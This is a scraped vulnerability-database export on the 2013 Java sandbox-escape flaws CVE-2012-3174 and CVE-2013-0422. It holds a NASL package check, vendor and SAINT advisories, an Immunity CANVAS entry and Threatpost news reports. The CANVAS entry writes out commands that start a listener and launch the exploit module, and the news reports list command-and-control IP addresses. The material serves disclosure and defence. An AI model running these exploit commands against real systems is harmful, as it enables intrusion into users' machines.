script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE12\\.2\");\n\n script_tag(name:\"affected\", value:\"java-1_7_0-openjdk on openSUSE 12.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"insight\", value:\"java-1_7_0-openjdk was updated to icedtea-2.3.4 fixing bugs\n and also severe security issues:\n\n * Security fixes\n\n - S8004933, CVE-2012-3174: Improve MethodHandle\n interaction with libraries\n\n - S8006017, CVE-2013-0422: Improve lookup resolutions\n\n - S8006125: Update MethodHandles library interactions\n\n * Bug fixes\n\n - S7197906: BlockOffsetArray::power_to_cards_back() needs\n to handle &> 32 bit shifts\n\n - G422525: Fix building with PaX enabled kernels.\n\n - use gpg-offline to check the validity of icedtea tarball\n\n - use jamvm on %arm\n\n - use icedtea package name instead of protected openjdk for\n jamvm builds\n\n - fix armv5 build\n\n - update to java access bridge 1.26.2\n\n * bugfix release, mainly 64bit JNI and JVM support\n\n - fix a segfault in AWT code - (bnc#792951)\n\n * add openjdk-7-src-b147-awt-crasher.patch\n\n - turn pulseaudio off on pre 11.4 distros\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk\", rpm:\"java-1_7_0-openjdk~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debuginfo\", rpm:\"java-1_7_0-openjdk-debuginfo~1.7.0.6~3.20.1\", 
rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-debugsource\", rpm:\"java-1_7_0-openjdk-debugsource~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo\", rpm:\"java-1_7_0-openjdk-demo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-demo-debuginfo\", rpm:\"java-1_7_0-openjdk-demo-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel\", rpm:\"java-1_7_0-openjdk-devel~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-devel-debuginfo\", rpm:\"java-1_7_0-openjdk-devel-debuginfo~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-javadoc\", rpm:\"java-1_7_0-openjdk-javadoc~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_7_0-openjdk-src\", rpm:\"java-1_7_0-openjdk-src~1.7.0.6~3.20.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:35:23", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3174"], "description": "**Issue Overview:**\n\nTwo improper permission check issues were discovered in the reflection API in OpenJDK. 
An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.\n\n \n**Affected Packages:** \n\n\njava-1.7.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.7.0-openjdk_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.15.amzn1.i686 \n java-1.7.0-openjdk-1.7.0.9-2.3.4.1.15.amzn1.i686 \n java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.15.amzn1.i686 \n java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.15.amzn1.i686 \n java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.15.amzn1.i686 \n \n noarch: \n java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.15.amzn1.noarch \n \n src: \n java-1.7.0-openjdk-1.7.0.9-2.3.4.1.15.amzn1.src \n \n x86_64: \n java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.15.amzn1.x86_64 \n java-1.7.0-openjdk-1.7.0.9-2.3.4.1.15.amzn1.x86_64 \n java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.15.amzn1.x86_64 \n java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.15.amzn1.x86_64 \n java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.15.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2013-02-03T12:35:00", "published": "2013-02-03T12:35:00", "id": "ALAS-2013-151", "href": "https://alas.aws.amazon.com/ALAS-2013-151.html", "title": "Important: java-1.7.0-openjdk", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "description": "Added: 01/14/2013 \nCVE: [CVE-2013-0422](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422>) \nBID: [57246](<http://www.securityfocus.com/bid/57246>) \nOSVDB: [89059](<http://www.osvdb.org/89059>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \n\n### Problem\n\nTwo vulnerabilities exist in Java versions prior to 7 Update 11. 
The first vulnerability allows the _findClass_ method of the _MBeanInstantiator_ class to return a Class reference to any package. However, the _MBeanInstantiator_ class constructor is private, so a reference to an instance object must be found. The _newMBeanServer_ static method will return a _JmxMBeanServer_ instance, which contains a reference to an instance of _MBeanInstantiator_. \nThe second vulnerability has to do with security checks performed when calling methods using reflection. The nested _Lookup_ class of the _MethodHandles_ class performs security validation by calling its _checkSecurityManager_ method. The _checkSecurityManager_ method then attempts to walk the call stack by calling the _getCallerClassAtEntryPoint_ method. This method simply returns the result of the _Reflection.getCallerClass_ method. This method should skip stack frames relating to the Reflection API. However, it does not properly skip Reflection API frames, which may allow the security checks to be bypassed. \nThe combination of these two vulnerabilities may allow an attacker to execute arbitrary Java code with full privileges on the target system. \n\n### Resolution\n\nUpgrade to [Java 7 Update 11](<http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>) or later. This update does not fix the vulnerability, but it does flag all code from unknown sources. Users will be prompted to execute the Java applet, but if they choose to execute the applet, they can still be compromised. Disabling Java browser plug-ins is a more robust solution, but may impact any webapps that use Java applets. 
\n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html> \n<http://www.cbsnews.com/8301-205_162-57563846/java-7-patch-released-experts-say-may-contain-flaws/> \n<http://www.reuters.com/article/2013/01/13/us-java-oracle-security-idUSBRE90C0JB20130113> \n<http://www.bbc.co.uk/news/technology-21011669> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 10 on Windows XP SP3 English (DEP OptIn), Windows 7 SP1 (DEP OptIn), Mac OS X 10.7.5, and Ubuntu 12.04.1 LTS. \n\n### Platforms\n\nWindows \nMac OS X \nLinux \n \n\n", "edition": 1, "modified": "2013-01-14T00:00:00", "published": "2013-01-14T00:00:00", "id": "SAINT:B859AECDBB7016A3F1E3446FE83018A3", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/java_MbeanInstantiator_findClass_recursive_reflection", "type": "saint", "title": "Java MBeanInstantiator.findClass and Recursive Reflection Sandbox Escape", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:40", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "description": "Added: 01/14/2013 \nCVE: [CVE-2013-0422](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422>) \nBID: [57246](<http://www.securityfocus.com/bid/57246>) \nOSVDB: [89059](<http://www.osvdb.org/89059>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \n\n### Problem\n\nTwo vulnerabilities exist in Java versions prior to 7 Update 11. The first vulnerability allows the _findClass_ method of the _MBeanInstantiator_ class to return a Class reference to any package. However, the _MBeanInstantiator_ class constructor is private, so a reference to an instance object must be found. 
The _newMBeanServer_ static method will return a _JmxMBeanServer_ instance, which contains a reference to an instance of _MBeanInstantiator_. \nThe second vulnerability has to do with security checks performed when calling methods using reflection. The nested _Lookup_ class of the _MethodHandles_ class performs security validation by calling its _checkSecurityManager_ method. The _checkSecurityManager_ method then attempts to walk the call stack by calling the _getCallerClassAtEntryPoint_ method. This method simply returns the result of the _Reflection.getCallerClass_ method. This method should skip stack frames relating to the Reflection API. However, it does not properly skip Reflection API frames, which may allow the security checks to be bypassed. \nThe combination of these two vulnerabilities may allow an attacker to execute arbitrary Java code with full privileges on the target system. \n\n### Resolution\n\nUpgrade to [Java 7 Update 11](<http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>) or later. This update does not fix the vulnerability, but it does flag all code from unknown sources. Users will be prompted to execute the Java applet, but if they choose to execute the applet, they can still be compromised. Disabling Java browser plug-ins is a more robust solution, but may impact any webapps that use Java applets. \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html> \n<http://www.cbsnews.com/8301-205_162-57563846/java-7-patch-released-experts-say-may-contain-flaws/> \n<http://www.reuters.com/article/2013/01/13/us-java-oracle-security-idUSBRE90C0JB20130113> \n<http://www.bbc.co.uk/news/technology-21011669> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 10 on Windows XP SP3 English (DEP OptIn), Windows 7 SP1 (DEP OptIn), Mac OS X 10.7.5, and Ubuntu 12.04.1 LTS. 
\n\n### Platforms\n\nWindows \nMac OS X \nLinux \n \n\n", "edition": 4, "modified": "2013-01-14T00:00:00", "published": "2013-01-14T00:00:00", "id": "SAINT:E7792D5FC9067F389F8BD984BD06BD44", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/java_MbeanInstantiator_findClass_recursive_reflection", "title": "Java MBeanInstantiator.findClass and Recursive Reflection Sandbox Escape", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:22", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "edition": 2, "description": "Added: 01/14/2013 \nCVE: [CVE-2013-0422](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422>) \nBID: [57246](<http://www.securityfocus.com/bid/57246>) \nOSVDB: [89059](<http://www.osvdb.org/89059>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \n\n### Problem\n\nTwo vulnerabilities exist in Java versions prior to 7 Update 11. The first vulnerability allows the _findClass_ method of the _MBeanInstantiator_ class to return a Class reference to any package. However, the _MBeanInstantiator_ class constructor is private, so a reference to an instance object must be found. The _newMBeanServer_ static method will return a _JmxMBeanServer_ instance, which contains a reference to an instance of _MBeanInstantiator_. \nThe second vulnerability has to do with security checks performed when calling methods using reflection. The nested _Lookup_ class of the _MethodHandles_ class performs security validation by calling its _checkSecurityManager_ method. The _checkSecurityManager_ method then attempts to walk the call stack by calling the _getCallerClassAtEntryPoint_ method. This method simply returns the result of the _Reflection.getCallerClass_ method. 
This method should skip stack frames relating to the Reflection API. However, it does not properly skip Reflection API frames, which may allow the security checks to be bypassed. \nThe combination of these two vulnerabilities may allow an attacker to execute arbitrary Java code with full privileges on the target system. \n\n### Resolution\n\nUpgrade to [Java 7 Update 11](<http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>) or later. This update does not fix the vulnerability, but it does flag all code from unknown sources. Users will be prompted to execute the Java applet, but if they choose to execute the applet, they can still be compromised. Disabling Java browser plug-ins is a more robust solution, but may impact any webapps that use Java applets. \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html> \n<http://www.cbsnews.com/8301-205_162-57563846/java-7-patch-released-experts-say-may-contain-flaws/> \n<http://www.reuters.com/article/2013/01/13/us-java-oracle-security-idUSBRE90C0JB20130113> \n<http://www.bbc.co.uk/news/technology-21011669> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 10 on Windows XP SP3 English (DEP OptIn), Windows 7 SP1 (DEP OptIn), Mac OS X 10.7.5, and Ubuntu 12.04.1 LTS. 
\n\n### Platforms\n\nWindows \nMac OS X \nLinux \n \n\n", "modified": "2013-01-14T00:00:00", "published": "2013-01-14T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/java_MbeanInstantiator_findClass_recursive_reflection", "id": "SAINT:30B6CFDC962268E8CEAB02B936B3AA0D", "type": "saint", "title": "Java MBeanInstantiator.findClass and Recursive Reflection Sandbox Escape", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0431", "CVE-2013-0422"], "description": "Added: 03/04/2013 \nCVE: [CVE-2013-0431](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0431>) \nBID: [57726](<http://www.securityfocus.com/bid/57726>) \nOSVDB: [89613](<http://www.osvdb.org/89613>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \n\n### Problem\n\nJava versions prior to 7 Update 13 are vulnerable to a sandbox security bypass due to a misuse of the java.lang.reflect.Method class by the com.sun.jmx.mbeanserver.Introspector class. When combined with the MBeanInstantiator findClass vulnerability from CVE-2013-0422, this may allow an attacker to embed malicious java applets into a webpage and have a payload of their choice execute on a victim's system while bypassing all security warnings. \n\n### Resolution\n\nApply the updates specified in the [ Oracle Java SE Critical Patch Update Advisory - February 2013](<http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html>). 
\n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html> \n<http://support.novell.com/security/cve/CVE-2013-0431.html> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 11 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2013-03-04T00:00:00", "published": "2013-03-04T00:00:00", "id": "SAINT:A4279A54731FBED2154E23C3F5839BB9", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/java_findclass_introspector_sandbox_escape", "title": "Java MBeanInstantiator findClass and Introspector Sandbox Escape", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:24", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0431", "CVE-2013-0422"], "edition": 2, "description": "Added: 03/04/2013 \nCVE: [CVE-2013-0431](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0431>) \nBID: [57726](<http://www.securityfocus.com/bid/57726>) \nOSVDB: [89613](<http://www.osvdb.org/89613>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \n\n### Problem\n\nJava versions prior to 7 Update 13 are vulnerable to a sandbox security bypass due to a misuse of the java.lang.reflect.Method class by the com.sun.jmx.mbeanserver.Introspector class. When combined with the MBeanInstantiator findClass vulnerability from CVE-2013-0422, this may allow an attacker to embed malicious java applets into a webpage and have a payload of their choice execute on a victim's system while bypassing all security warnings. 
\n\n### Resolution\n\nApply the updates specified in the [ Oracle Java SE Critical Patch Update Advisory - February 2013](<http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html>). \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html> \n<http://support.novell.com/security/cve/CVE-2013-0431.html> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 11 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-03-04T00:00:00", "published": "2013-03-04T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/java_findclass_introspector_sandbox_escape", "id": "SAINT:ADBCEB1FB086DA5B935080CE40F6277F", "title": "Java MBeanInstantiator findClass and Introspector Sandbox Escape", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0431", "CVE-2013-0422"], "description": "Added: 03/04/2013 \nCVE: [CVE-2013-0431](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0431>) \nBID: [57726](<http://www.securityfocus.com/bid/57726>) \nOSVDB: [89613](<http://www.osvdb.org/89613>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \n\n### Problem\n\nJava versions prior to 7 Update 13 are vulnerable to a sandbox security bypass due to a misuse of the java.lang.reflect.Method class by the com.sun.jmx.mbeanserver.Introspector class. When combined with the MBeanInstantiator findClass vulnerability from CVE-2013-0422, this may allow an attacker to embed malicious java applets into a webpage and have a payload of their choice execute on a victim's system while bypassing all security warnings. 
\n\n### Resolution\n\nApply the updates specified in the [ Oracle Java SE Critical Patch Update Advisory - February 2013](<http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html>). \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html> \n<http://support.novell.com/security/cve/CVE-2013-0431.html> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 11 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2013-03-04T00:00:00", "published": "2013-03-04T00:00:00", "id": "SAINT:9AD9476D8EB15E21C99160959F48E5D8", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/java_findclass_introspector_sandbox_escape", "type": "saint", "title": "Java MBeanInstantiator findClass and Introspector Sandbox Escape", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2019-05-29T19:48:19", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "edition": 2, "description": "**Name**| java_MBeanInstantiator_findClass \n---|--- \n**CVE**| CVE-2013-0422 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| java_MBeanInstantiator_findClass \n**Notes**| CVE Name: CVE-2013-0422 \nVENDOR: Sun \nNotes: \n \nAffected versions \nJDK and JRE 7 Update 10 and earlier \n \nTested on: \n\\- Windows 7 with JDK/JRE 7 update 10 \n \nTo run from command line, first start the listener (UNIVERSAL): \npython commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17 \n \nAnd then run the exploit from clientd: \npython ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_MBeanInstantiator_findClass -O allowed_recon_modules:js_recon -O auto_detect_exploits:0 \n \n \nRepeatability: Infinite (client side - no crash) \nReferences: 
http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422 \nDate public: 01/10/2013 \n\n", "modified": "2013-01-10T21:55:00", "published": "2013-01-10T21:55:00", "id": "JAVA_MBEANINSTANTIATOR_FINDCLASS", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/java_MBeanInstantiator_findClass", "type": "canvas", "title": "Immunity Canvas: JAVA_MBEANINSTANTIATOR_FINDCLASS", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T23:01:36", "bulletinFamily": "info", "cvelist": ["CVE-2013-0422"], "description": "Scammers are spamming out malicious emails purporting to come from payroll processing company ADP, according Dancho Danchev of Webroot.\n\nThe emails arrive under the subject line \u201cADP Immediate Notifications\u201d and contain links to compromised websites hosting the latest iteration of the[ Blackhole exploit kit](<https://threatpost.com/cool-blackhole-exploit-kits-created-same-hacker-010913/>). The kit is serving CVE-2013-0422 Java exploit, which Danchev claimed was still active when he published his report. However, [Oracle appears to have patched the bug sometime yesterday](<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>).\n\nThe exploit is dropping the \u2018Win32/Cridex.E\u2019 and \u2018Win32/Farei\u2019 Trojans, which are detected by 12 and eight out of 46 antivirus scanners respectively. After exploitation, the malware is phoning home to command and control servers at the following IP addresses: 173.201.177.77, 132.248.49.112, 95.142.167.193, and 81.93.250.157.\n\nThe campaign makes use of a healthy list of suspicious looking URLs that you can check out along with [Danchev\u2019s write-up](<http://blog.webroot.com/2013/01/14/fake-adp-speedy-notifications-lead-to-client-side-exploits-and-malware/>). 
It\u2019s fairly commonplace for social engineers [to mimic ADP in their phishing campaigns](<https://threatpost.com/fake-adp-and-fdic-notifications-leading-users-blackhole-exploit-kit-091412/>) because of the vastness of the company\u2019s payroll operation.\n\n\n", "modified": "2013-05-13T19:06:03", "published": "2013-01-14T18:29:21", "id": "THREATPOST:957A3FEFD479E0736CDB1542A4319181", "href": "https://threatpost.com/adp-themed-phishing-emails-lead-blackhole-sites-011413/77402/", "type": "threatpost", "title": "ADP-Themed Phishing Emails Lead to Blackhole Sites", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:36", "bulletinFamily": "info", "cvelist": ["CVE-2013-0422"], "description": "Oracle\u2019s emergency Java update this weekend for a [zero-day sandbox bypass vulnerability](<https://threatpost.com/nasty-new-java-zero-day-found-exploit-kits-already-have-it-011013/>) hasn\u2019t exactly kicked off a love-fest for the company among security experts. Researchers are still cautious about recommending users re-enable the ubiquitous software, despite the availability of the fix for the latest zero-day to target the platform. 
\n\nSome caution there are still ways to bypass a [heightened security configuration in the update](<http://www.oracle.com/technetwork/java/javase/7u-relnotes-515228.html>), and yet others remain concerned about fixes for vulnerabilities reported months ago that still have not been addressed.\n\nAdam Gowdiak of Security Explorations in Poland said Oracle has yet to address vulnerabilities reported in April and September of last year; the [September vulnerability](<https://threatpost.com/new-zero-day-vulnerability-found-java-5-6-and-7-11-billion-desktops-affected-092612/>), like the one fixed over the weekend, is a sandbox bypass vulnerability that would enable an attacker to remotely execute code.\n\n\u201c[This] is especially important as a critical vulnerability that affects all Java SE versions released over the [last] eight years or so,\u201d Gowdiak said. \u201cWe have confirmed that our proof of concept code for it works with flying colors under Java SE 7 Update 11 released yesterday.\u201d\n\nJaime Blasco, a researcher with AlienVault, echoes Gowdiak\u2019s concerns that users should continue to leave the Java browser plug-in disabled.\n\n\u201cI don\u2019t think it\u2019s very useful right now,\u201d Blasco said. \u201cI think right now you won\u2019t find Java applets on most websites; regular users don\u2019t need Java right now.\u201d\n\n[Oracle rushed Java 1.7u11 out the door on Sunday](<http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>), less than a week after the discovery of the vulnerability and exploits in the wild. The most noteworthy enhancement is that Oracle has changed Java\u2019s default security level setting to high from medium. 
As a result, unsigned or self-signed Java applications will no longer run by default; users will have to approve applets to run them.\n\n\u201cWith the \u2018High\u2019 setting, the user is always warned before any unsigned application is run to prevent silent exploitation,\u201d Oracle said in its advisory.\n\nBlasco said while this is a good first step, it would not prevent an attacker from tricking the user via social engineering, for example, to execute a malicious applet manually. Also, an attacker with a valid, stolen digital certificate could also, in theory, sign and execute a malicious applet.\n\nThe call to disable Java began again in earnest last Thursday when French researcher [Kafeine](<http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html>) reported that he found websites hosting exploits for a new zero-day and that exploit kits such as Blackhole had already incorporated the exploit. Soon, most of the major exploit kits including Cool, Nuclear Pack, Sakura, and Redkit, had the exploits. By Friday, an exploit module for the zero-day had been added to [Metasploit](<https://community.rapid7.com/community/metasploit/blog/2013/01/11/omg-java-everybody-panic>), and it was game-on.\n\nHD Moore, Metasploit creator, said the issue in Java 7u10 was a privilege-escalation vulnerability ([CVE-2013-0422](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422>)) in the MBeanInstantiator.\n\n\u201cA lot of the recent Java exploits use a technique similar to this one where they find a class that\u2019s already loaded in memory that accesses an object outside the sandbox, and then they use that object to load arbitrary code,\u201d Moore told Threatpost last week. \u201cIt\u2019s about as bad as you can get in terms of a reliable Java exploit that affects the latest version of Java 1.7. 
It\u2019s already being used by all the bad guys and at this point, it\u2019s just catch-up and how fast Oracle can respond.\u201d\n\nFireEye reported last week, and Blasco confirmed today, that some [exploits are serving up ransomware](<https://threatpost.com/incomplete-java-patch-paved-way-latest-zero-day-mess-011113/>). Now that the exploits are part of kits, any payload from banking Trojans, to keyloggers or botnets can be added, researchers said.\n\n\u201cHaving this in the exploit kits is the worst possible scenario; exploit kits are one of the biggest security issues users are facing,\u201d Blasco said. \u201cIf you are a cybercriminal and have money, you will get something that works. You can buy anything, even without knowing anything about coding exploits.\u201d\n\nJava\u2019s availability on numerous platforms from Windows to Linux to Mac OS X makes it an [attractive target for exploit writers](<https://threatpost.com/security-experts-recommend-long-hard-look-disabling-java-browser-plug-100412/>). A reliable exploit will run anywhere.\n\n\u201cIf you have an exploit for memory issues and the exploit is reliable, you don\u2019t have to code a different exploit for different languages or platforms, it just works everywhere. You will have 100 percent probability of exploiting the target if it is vulnerable to that issue.\u201d\n", "modified": "2013-05-10T14:25:22", "published": "2013-01-14T16:40:39", "id": "THREATPOST:8EC50F1755EA55A58BB75546EB1CB667", "href": "https://threatpost.com/emergency-zero-day-patch-does-not-quiet-calls-disable-java-011413/77401/", "type": "threatpost", "title": "Emergency Zero-Day Patch Does Not Quiet Calls to Disable Java", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:16", "bulletinFamily": "info", "cvelist": ["CVE-2013-0422"], "description": "Another day, another media company hacked. 
This time it\u2019s NBC which has fallen victim to hackers on the heels of compromises of the _[New York Times](<https://threatpost.com/inside-targeted-attack-new-york-times-013113/>)_ and _Wall Street Journal_ websites. Various experts have confirmed that NBC\u2019s website is compromised and leading visitors to the dangerous [Citadel banking Trojan](<https://www.google.com/url?q=http://threatpost.com/en_us/blogs/citadel-trojan-it-s-not-just-banking-fraud-anymore-020113&sa=U&ei=wosmUfPPKYei2QXMy4C4Ag&ved=0CAoQFjAB&client=internal-uds-cse&usg=AFQjCNHMrwHVyHwOjJNPZQxj_el4hxq2wQ>). The site is reportedly hosting an iframe that is redirecting visitors to sites hosting the RedKit Exploit Kit which is serving up the Citadel malware. \n\n\n[The HitmanPro blog](<http://hitmanpro.wordpress.com/2013/02/21/nbc-com-hacked-serving-up-citadel-malware/>) said there were two malicious links on the NBC site connecting to the exploits, one on the home page and another on an internal page. The links serve Java and PDF exploits that drop Citadel; the Java exploit is the same [sandbox bypass vulnerability](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422>) patched in Java 7u11.\n\nThe site remained infected as of 3:30 p.m. ET as attackers were rotating out the iframes regularly, each pointing to a number of attack pages, including a site with a Russian name that translates to my-new-sploit [dot]com.\n\nResearchers at Kaspersky Lab confirmed the redirections are leading victims to Citadel and Zeus (Trojan-Spy.Win32.Zbot.jfgj). Citadel is a version of Zeus and is used primarily for banking fraud. 
